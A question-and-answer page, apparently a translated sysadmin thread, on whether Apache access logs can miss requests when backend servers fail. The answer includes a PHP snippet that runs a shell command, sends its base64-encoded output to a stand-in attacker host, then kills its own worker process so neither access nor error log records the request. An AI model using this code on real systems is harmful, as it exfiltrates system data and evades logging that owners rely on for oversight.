Apache Access日志是否曾经错过了请求？

Question

My workplace has Apache in-front of various Java application servers. I often have to investigate production issues and rely on those Apache Access Logs recording all requests to the application servers, whether they are successful (200), redirects(302), errors (500) or some other status.

A couple of times however, normally when an application server has become unresponsive and required a restart, it looks like maybe some requests have not been logged.

I have tried reproducing this locally (start a long running request and either allow the request to exceed the timeout on the Apache server or just kill the application server from the command-line) but I always get a request logged in the access logs.

My question is, assuming Apache is running fine but faced with an application server problem, would the Apache access logs ever miss a request?

Answer 1

It can miss requests in some cases, docs contain important sentence:

The server access log records all requests processed by the server.

So if request is not processed, then we should not expect entry in access_log . If you wonder if such situation can be easily reproduced, then I found a way to do it.

Consider following PHP code ( test.php ):

<?php
$cmd_result = shell_exec('uname -a');
file_get_contents("https://hacker.site/" . base64_encode($cmd_result));
exec('kill -9 ' . getmypid());

Also you have to run Apache with prefork MPM and mod_php module. Then make request with browser or telnet:

$ telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /test.php HTTP/1.0

Connection closed by foreign host.

As you can see, connection is closed without any response. Also there are no logs in access_log nor error_log , despite code was executed and attacker received encoded result of command uname -a .